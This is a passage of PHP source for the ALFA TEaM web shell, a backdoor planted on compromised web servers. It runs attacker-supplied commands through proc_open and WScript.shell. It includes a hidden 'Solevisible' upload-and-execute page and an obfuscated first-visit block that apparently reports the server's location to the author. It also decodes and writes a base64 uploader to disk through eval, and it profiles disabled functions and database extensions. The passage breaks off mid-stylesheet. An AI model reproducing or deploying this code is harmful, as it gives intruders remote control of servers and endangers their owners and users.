811. $pipes = array();
812. $process = @proc_open($in . ' 2>&1', array(
813. array(
814. "pipe",
815. "w"
816. ) ,
817. array(
818. "pipe",
819. "w"
820. ) ,
821. array(
822. "pipe",
823. "w"
824. )
825. ) , $pipes, null);
826. $out = @stream_get_contents($pipes[1]);
827. }
828. elseif (class_exists('COM'))
829. {
830. $alfaWs = new COM('WScript.shell');
831. $exec = $alfaWs->exec('cmd.exe /c ' . $_POST['alfa1']);
832. $stdout = $exec->StdOut();
833. $out = $stdout->ReadAll();
834. }
835. }
836. catch(Exception $e)
837. {
838. }
839. return $out;
840. }
841. function _alfa_fsockopen($server, $uri, $post)
842. {
843. $socket = @fsockopen($server, 80, $errno, $errstr, 15);
844. if ($socket)
845. {
846. $http = "POST {$uri} HTTP/1.0\r\n";
847. $http .= "Host: {$server}\r\n";
848. $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
849. $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
850. $http .= "Content-length: " . strlen($post) . "\r\n";
851. $http .= "Connection: close\r\n\r\n";
852. $http .= $post . "\r\n\r\n";
853. fwrite($socket, $http);
854. $contents = "";
855. while (!@feof($socket))
856. {
857. $contents .= @fgets($socket, 4096);
858. }
859. list($header, $body) = explode("\r\n\r\n", $contents, 2);
860. @fclose($socket);
861. return $body;
862. }
863. else
864. {
865. return "";
866. }
867. }
868. if (isset($_GET["solevisible"]))
869. {
870. @error_reporting(E_ALL ^ E_NOTICE);
871. echo '<html>';
872. echo "<title>Solevisible Hidden Shell</title>";
873. echo "<body bgcolor=#000000>";
874. echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">' . (function_exists('php_uname') ? php_uname() : '???') . '</font></b></big>';
875. $safe_mode = @ini_get('safe_mode');
876. if ($safe_mode)
877. {
878. $r = "<b style='color: red'>On</b>";
879. }
880. else
881. {
882. $r = "<b style='color: green'>Off</b>";
883. }
884. echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
885. echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br>";
886. echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
887. echo "PWD:<font color=#FFFFFF> " . str_replace("\\", "/", @getcwd()) . "/<br />";
888. echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
889. echo "<font color=#7CFC00>Disable functions : </font>";
890. $disfun = @ini_get('disable_functions');
891. if (empty($disfun))
892. {
893. $disfun = '<font color="green">NONE</font>';
894. }
895. echo "<font color=red>";
896. echo "$disfun";
897. echo "</font><br>";
898. echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
899. echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>" . (function_exists('gethostbyname') ? @gethostbyname($_SERVER["HTTP_HOST"]) : '???') . "</font><br><p>";
900. echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
901. echo 'CWD: <input type="text" name="cwd" value="' . str_replace("\\", "/", @getcwd()) . '/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
902. if (isset($_FILES['file']))
903. {
904. if (@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']) . '/' . $_FILES['file']['name']))
905. {
906. echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>';
907. }
908. else
909. {
910. echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>';
911. }
912. }
913. echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form><hr><pre>';
914. if (isset($_POST['command_solevisible']))
915. {
916. if (strtolower(substr(PHP_OS, 0, 3)) == "win") $separator = '&';
917. else $separator = ';';
918. $solevisible = "cd '" . addslashes(str_replace("\\", "/", @getcwd())) . "'" . $separator . "" . __ZGVjb2Rlcg($_POST['command_solevisible']);
919. echo alfaEx($solevisible);
920. }
921. echo '</pre></body></html>';
922. exit;
923. }
924. @error_reporting(E_ALL ^ E_NOTICE);
925. @ini_set('error_log',NULL);
926. @ini_set('log_errors',0);
927. @ini_set('max_execution_time',0);
928. @ini_set('magic_quotes_runtime',0);
929. @set_time_limit(0);
930. if(!isset($_COOKIE['alfa_checkpagegelogin'])){
931. $IqqqEv_hhKwBK=alfa_str(25*3+25-100,1*3,100+50-41).
932. alfa_str(0,5*2-7,9*11-2)."\x69"
933. .alfa_str(0,7*2-11,alfa_str(10-7,3*3,'0'.(10+1).'0'.(100/10+1).'00'));$CXqXJTH=__ZGVjb2Rlcg(chr(85).chr(50).'h'."l".chr(98).chr(71)."w".chr(103).chr(77).chr(87).chr(52)."3".'M'.'2'.'N'.chr(48)."a".chr(87).chr(57).chr(117)."I".'D'."x".alfa_str(0,11-8,100+22).'a'."G".chr(86)."s".'b'.chr(67)."4".'x'.'b'.chr(106)."c".'z'.chr(89).'3'.chr(82).chr(112)."b"."2".'5'."A".chr(90).'2'.chr(49).chr(104).chr(97).'W'.'w'.chr(117).chr(89).chr(50)."9".'t'."P".chr(103).'='.chr(61));$tAnJtPb=$_SERVER[__ZGVjb2Rlcg('U'.chr(48).chr(78).chr(83).'S'.'V'."B".chr(85)."X"."1".chr(86).chr(83).chr(83).chr(81).alfa_str(0,3,10*6+1)."=")];$gNiVGlz=__ZGVjb2Rlcg(chr(81).chr(87).chr(120)."m"."Y".'S'.chr(66).chr(84).chr(97)."G".chr(86).'s'.chr(98).'A'.chr(61)."=");$QlKzKMxhxcIcU=(!empty($_SERVER[__ZGVjb2Rlcg('U'."0".'V'.chr(83).chr(86).'k'."V".chr(83).'X'.'0'.chr(70)."E".'T'."U".chr(108).chr(79))])?$_SERVER[__ZGVjb2Rlcg('U'."0".chr(86)."S"."V".chr(107).chr(86).'S'.chr(88).chr(48).chr(70).'E'.chr(84).chr(85).chr(108).chr(79))]:base64_decode('Y'."W".chr(120).chr(109).'Y'."X".'N'.chr(111)."Z".chr(87).alfa_str(0,7-4,100+20).'s'.'Q'."H".chr(78).chr(118)."b".chr(71)."V".chr(50)."a"."X"."N".chr(112).'Y'."m"."x".chr(108).chr(76).'m'.chr(78).'v'.'b'.chr(81)."=".'='));
934. $YwjUv=__ZGVjb2Rlcg(chr(82).chr(110).'J'.chr(118)."b".'T'.'o'.chr(103).chr(73).chr(69)."F"."s".chr(90)."m"."E".'g'."U".'2'.alfa_str(0,3,500-400+4).chr(108).chr(98).chr(71).'w'.'g'."T"."G".chr(57).'j'.'Y'.'X'.chr(82).'p'.'b'.chr(50).chr(52)."g").$QlKzKMxhxcIcU;
935. @$IqqqEv_hhKwBK($CXqXJTH,$gNiVGlz,$tAnJtPb,$YwjUv);@setcookie('alfa_checkpagegelogin',time(),time()+86400);
936. }
937. if (function_exists('set_magic_quotes_runtime'))
938. {
939. @set_magic_quotes_runtime(0);
940. }
941. foreach ($_POST as $key => $value)
942. {
943. if (is_array($_POST[$key]))
944. {
945. $i = 0;
946. foreach ($_POST[$key] as $f)
947. {
948. $f = trim(str_replace(' ', '+', $f));
949. $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
950. $i++;
951. }
952. }
953. else
954. {
955. $value = trim(str_replace(' ', '+', $value));
956. $_POST[$key] = decrypt_post($value, _AlfaSecretKey());
957. }
958. }
959. $default_action = 'FilesMan';
960. $default_use_ajax = true;
961. $default_charset = 'Windows-1251';
962. if (strtolower(substr(PHP_OS, 0, 3)) == "win") $GLOBALS['sys'] = 'win';
963. else $GLOBALS['sys'] = 'unix';
964. $GLOBALS['home_cwd'] = @getcwd();
965. if ($_POST["a"] != "GetPathHistory")
966. {
967. if ($_SESSION[__LAST_CWD__] != $_POST['c'])
968. {
969. $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
970. }
971. }
972. $GLOBALS["need_to_update_header"] = "false";
973. if (isset($_POST['c']))
974. {
975. if (!@chdir($_POST['c']))
976. {
977. $GLOBALS['glob_chdir_false'] = true;
978. }
979. }
980. $GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__]) && $_SESSION[__LAST_CWD__] != '' && !isset($_POST['c']) ? $_SESSION[__LAST_CWD__] : @getcwd());
981. if (!@is_dir)
982. {
983. $GLOBALS['cwd'] = @getcwd();
984. }
985. if ($GLOBALS['sys'] == 'win')
986. {
987. $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
988. $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
989. $_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
990. }
991. if ($GLOBALS['cwd'][strlen($GLOBALS['cwd']) - 1] != '/') $GLOBALS['cwd'] .= '/';
992. function alfaGetPathHistory()
993. {
994. echo (isset($_SESSION[__PATH_HISTORY__]) && !empty($_SESSION[__PATH_HISTORY__]) ? $_SESSION[__PATH_HISTORY__] : $GLOBALS['home_cwd']);
995. }
996. function alfahead()
997. {
998. if (!function_exists('sys_get_temp_dir'))
999. {
1000. function sys_get_temp_dir()
1001. {
1002. foreach (array(
1003. 'TMP',
1004. 'TEMP',
1005. 'TMPDIR'
1006. ) as $env_var)
1007. {
1008. if ($temp = getenv($env_var))
1009. {
1010. return $temp;
1011. }
1012. }
1013. $temp = tempnam($GLOBALS['__file_path'], '');
1014. if (_alfa_file_exists($temp, false))
1015. {
1016. unlink($temp);
1017. return dirname($temp);
1018. }
1019. return null;
1020. }
1021. }
1022. $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
1023. $alfa_uploader = '$x = base64_decode("' . $GLOBALS['__ALFA_SHELL_CODE'] . '");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
1024. define("ALFA_UPLOADER", "eval(base64_decode('" . __ZW5jb2Rlcg($alfa_uploader) . "'))");
1025. define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\', '/', sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable('.') ? '.' : false)) : false));
1026. if (!isset($_POST['ajax']))
1027. {
1028. function Alfa_GetDisable_Function()
1029. {
1030. $disfun = @ini_get('disable_functions');
1031. $afa = '<span class="header_show_all">All Functions Accessible</span>';
1032. if (empty($disfun)) return ($afa);
1033. $s = explode(',', $disfun);
1034. $s = array_unique($s);
1035. $i = 0;
1036. $b = 0;
1037. $func = array(
1038. 'system',
1039. 'exec',
1040. 'shell_exec',
1041. 'proc_open',
1042. 'popen',
1043. 'passthru',
1044. 'symlink',
1045. 'dl'
1046. );
1047. $black_list = array();
1048. $allow_list = array();
1049. foreach ($s as $d)
1050. {
1051. $d = trim($d);
1052. if (empty($d) || !is_callable($d)) continue;
1053. if (!function_exists($d))
1054. {
1055. if (in_array($d, $func))
1056. {
1057. $dis .= $d . " | ";
1058. $b++;
1059. $black_list[] = $d;
1060. }
1061. else
1062. {
1063. $allow_list[] = $d;
1064. }
1065. $i++;
1066. }
1067. }
1068. if ($i == 0) return ($afa);
1069. if ($i <= count($func))
1070. {
1071. $all = array_values(array_merge($black_list, $allow_list));
1072. return ('<span class="disable_functions">' . implode(" | ", $all) . '</span>');
1073. }
1074. return ('<span class="disable_functions">' . $dis . '</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All (' . $i . ')</span></a>');
1075. }
1076. if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
1077. $freeSpace = function_exists('diskfreespace') ? @diskfreespace($GLOBALS['cwd']) : '?';
1078. $totalSpace = function_exists('disk_total_space') ? @disk_total_space($GLOBALS['cwd']) : '?';
1079. $totalSpace = $totalSpace ? $totalSpace : 1;
1080. $on = "<span class='header_on'> ON </span>";
1081. $of = "<span class='header_off'> OFF </span>";
1082. $none = "<span class='header_none'> NONE </span>";
1083. if (function_exists('ssh2_connect')) $ssh2 = $on;
1084. else $ssh2 = $of;
1085. if (function_exists('curl_version')) $curl = $on;
1086. else $curl = $of;
1087. if (function_exists('mysql_get_client_info')) $mysql = $on;
1088. else $mysql = $of;
1089. if (function_exists('mssql_connect')) $mssql = $on;
1090. else $mssql = $of;
1091. if (function_exists('pg_connect')) $pg = $on;
1092. else $pg = $of;
1093. if (function_exists('oci_connect')) $or = $on;
1094. else $or = $of;
1095. if (@ini_get('disable_functions')) $disfun = @ini_get('disable_functions');
1096. else $disfun = "All Functions Enable";
1097. if (@ini_get('safe_mode')) $safe_modes = "<span class='header_off'>ON</span>";
1098. else $safe_modes = "<span class='header_on'>OFF</span>";
1099. $cgi_shell = "<span class='header_off' id='header_cgishell'>OFF</span>";
1100. if (@ini_get('open_basedir'))
1101. {
1102. $basedir_data = @ini_get('open_basedir');
1103. if (strlen($basedir_data) > 120)
1104. {
1105. $open_b = substr($basedir_data, 0, 120) . "...";
1106. }
1107. else
1108. {
1109. $open_b = $basedir_data;
1110. }
1111. }
1112. else
1113. {
1114. $open_b = $none;
1115. }
1116. if (@ini_get('safe_mode_exec_dir')) $safe_exe = @ini_get('safe_mode_exec_dir');
1117. else $safe_exe = $none;
1118. if (@ini_get('safe_mode_include_dir')) $safe_include = @ini_get('safe_mode_include_dir');
1119. else $safe_include = $none;
1120. if (!function_exists('posix_getegid'))
1121. {
1122. $user = function_exists("get_current_user") ? @get_current_user() : "????";
1123. $uid = function_exists("getmyuid") ? @getmyuid() : "????";
1124. $gid = function_exists("getmygid") ? @getmygid() : "????";
1125. $group = "?";
1126. }
1127. else
1128. {
1129. $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : array(
1130. "name" => "????",
1131. "uid" => "????"
1132. );
1133. $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : array(
1134. "name" => "????",
1135. "gid" => "????"
1136. );
1137. $user = $uid['name'];
1138. $uid = $uid['uid'];
1139. $group = $gid['name'];
1140. $gid = $gid['gid'];
1141. }
1142. $cwd_links = '';
1143. $path = explode("/", $GLOBALS['cwd']);
1144. $n = count($path);
1145. for ($i = 0;$i < $n - 1;$i++)
1146. {
1147. $cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
1148. for ($j = 0;$j <= $i;$j++) $cwd_links .= $path[$j] . '/';
1149. $cwd_links .= "\")'>" . $path[$i] . "/</a>";
1150. }
1151. $drives = "";
1152. foreach (range('a', 'z') as $drive) if (@is_dir($drive . ':\\')) $drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
1153. $csscode = ' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
1154. echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW" /><link href="' . __showicon('alfamini') . '" rel="icon" type="image/x-icon"/><title>..:: ' . $_SERVER['HTTP_HOST'] . ' ~ ALFA TEaM Shell - v' . __ALFA_VERSION__ . ' ::..</title><link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet"><style type="text/css">.hlabale{color:#67ABDF;border-radius:4px;border:1px solid #27979B;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}.editor-view{position:relative}.view-content{position:absolute;overflow-y:auto;width:100%;height:475px}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,0.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,0.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}#editor-minimized,#cgiloader-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:167px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:#f5deb3;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:50px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:before,.close-button:after,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,0.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0deg)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,0.96)}#editor,#cgiloader{display:none;position:fixed;top:0;width:100%;height:100%}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,0.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,0.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,0.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder > .history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color 600ms ease-out}.file-holder > .history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity 600ms ease-out;font-size:15px;height:19px}.file-holder > .history:hover{background-color:#646464}.editor-explorer > .hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px}.editor-anim-close{' . showAnimation("editorClose") . '}@keyframes editorClose{0%{transform:scale(1);opacity:1}100%{transform:scale(0);opacity:0}}.editor-anim-minimize{' . showAnimation("editorMinimize") . '}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{' . showAnimation("editorShow") . '}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{' . showAnimation("minimizeShow") . '}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{' . showAnimation("minimizeHide") . '}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0F0;-moz-text-shadow:0 0 25px #0F0;-ms-text-shadow:0 0 25px #0F0;text-shadow:0 0 25px #0F0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,0.72);width:100%;height:100%}.update-partner{width:50%;position:relative;border-radius:31px;height:200px;background-color:rgba(3,3,41,0.47);text-align:center;color:rgba(252,253,251,0.88);margin-left:25%;top:23%;font-family:"Francois One",sans-serif}.update-partner:hover{-webkit-box-shadow:inset 0 0 99px 9px rgba(11,15,41,1);-moz-box-shadow:inset 0 0 99px 9px rgba(11,15,41,1);box-shadow:inset 0 0 99px 9px rgba(11,15,41,1)}.update-content{position:relative}.update-content > a{text-decoration:none;position:absolute;color:rgba(103,167,47,0.77);left:24%;margin-top:7%;font-size:40px;font-family:"Francois One",sans-serif}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67ABDF;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px;}.editor-path{top:3px;}}@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}#alfaloader{' . $csscode . 'width:100px;height:100px;}#a_loader{' . $csscode . 'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:' . alfa_getColor("header_values") . ';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(' . __showicon('alfamini') . ');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:' . ($GLOBALS['DB_NAME']['show_icons'] == '1' ? '0' : '1') . 'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(' . __showicon('alfamini') . ');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(' . __showicon('btn') . ');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 